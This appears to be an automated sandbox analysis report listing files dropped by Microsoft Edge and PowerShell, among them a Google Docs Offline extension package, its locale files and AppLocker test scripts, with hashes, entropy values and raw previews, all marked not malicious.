                                                                                                                                                                                                                                                                                              Entropy (8bit):7.996057445951542
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
                                                                                                                                                                                                                                                                                              MD5:D7A1AC56ED4F4D17DD0524C88892C56D
                                                                                                                                                                                                                                                                                              SHA1:4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
                                                                                                                                                                                                                                                                                              SHA-256:0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
                                                                                                                                                                                                                                                                                              SHA-512:31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\5bd6ec82-72c3-4d07-a889-8f6ee12597c2.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138356
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                              MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                              SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                              SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                              SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\6cfd25c2-85e2-4eac-a56b-9a51d219e6ab.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2p5qaqos.de4.psm1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3r1dqhlz.pyi.psm1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ag0hnw4k.2q4.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdfbdflk.mym.psm1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_joyndkmz.z32.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhezbhxu.zcm.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\bf850630-2b97-4adf-9722-d95585f9466c.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:PNG image data, 204 x 264, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):437259
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.998726360451669
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:r0Ti9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:us1IBTI9LkhSqqQ0Xq
                                                                                                                                                                                                                                                                                              MD5:D14135E953CC12D6CE5AB9529108AB12
                                                                                                                                                                                                                                                                                              SHA1:A3CA22055B2864F479A137CFDA856009AEB693A7
                                                                                                                                                                                                                                                                                              SHA-256:91D3663C9ED02759863A7B0D7BB909BC09C172FB698CA65F01C4624A8E09DF46
                                                                                                                                                                                                                                                                                              SHA-512:9155BC046699A5B69424D2E1CD9AD00447C02E5CEC1377C8DAE592CB2639C1495FE0217FD906666FAF2D2D29F7FC27A2CA52DEC72B9A04D06DEBFC29F9C1C059
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............,......sRGB.........IDATx^..g.mE...`....f..A....Q......U~....;..e...A.T..%.. ..s.....=..u.9...gWM..9k....zzw.^.{..n..)G........l.S.B...`..!P ...`.4."..@...D0.X1...&>.....L.VLC ....@.@.S.....`..!P ...`.4."..@...D0.X1...&>.....L.VLC ....@.@.S.....`..!P ...`.4."..@...D0.X1...&>.....L.VLC ....@..J.....{..7.9.r.-....../}................g>s...K......G..n...._NW]u....<fr......#......O...?....n...M7.4...?.....9.....gl....MO|..[.W_}....O..W.2=.....?..u. ...g..<.9..|.....?......lz...f....+...9...t...w.{..(.k]X...7..~.Lw....'=.I...yf..........7.<=..O..p.;.l...7._...-..~........l.R.......}.U..........=...........U.Q=....~...4...~......\...Mx..zk...|d.M..........<..'m..^E;Ge_{.....g..C...........k.p..y8.'`w........?.yz.....t.E.5g..........U.8...&.+..bz...8..~...\..w.KK...=......&....~.-.M.~....L..x.....h:..Z...+.~...O1.F>.9...nhy..=....p..--.u.Y..>..f.....].w......}&=..\.z=iH...c.=v........k....V.....'........

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2110
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.400636375390121
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854RrQ:8e2Fa116uCntc5toYhRM
                                                                                                                                                                                                                                                                                              MD5:E5601AE885669424B407E6B50AD26E99
                                                                                                                                                                                                                                                                                              SHA1:8528B22C5D382A7B056CC188D0FF51ABCB95F4D7
                                                                                                                                                                                                                                                                                              SHA-256:8B5F249078377E9B98082284E4224637028EDF8096AB4FA5D05A3C3447447A0F
                                                                                                                                                                                                                                                                                              SHA-512:E5EE37595993F61FC18C77F7F600672C62FBCF73DE7DEA68980C8526B7CE87F6692286FCACDD779A21ECF9B9E7896821BC5B0EE79364BC094A196DB755B69694
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\5bd6ec82-72c3-4d07-a889-8f6ee12597c2.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138356
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                              MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                              SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                              SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                              SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4982
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                              MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                              SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                              SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                              SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):908
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                              MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                              SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                              SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                              SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1285
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                              MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                              SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                              SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                              SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                              MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                              SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
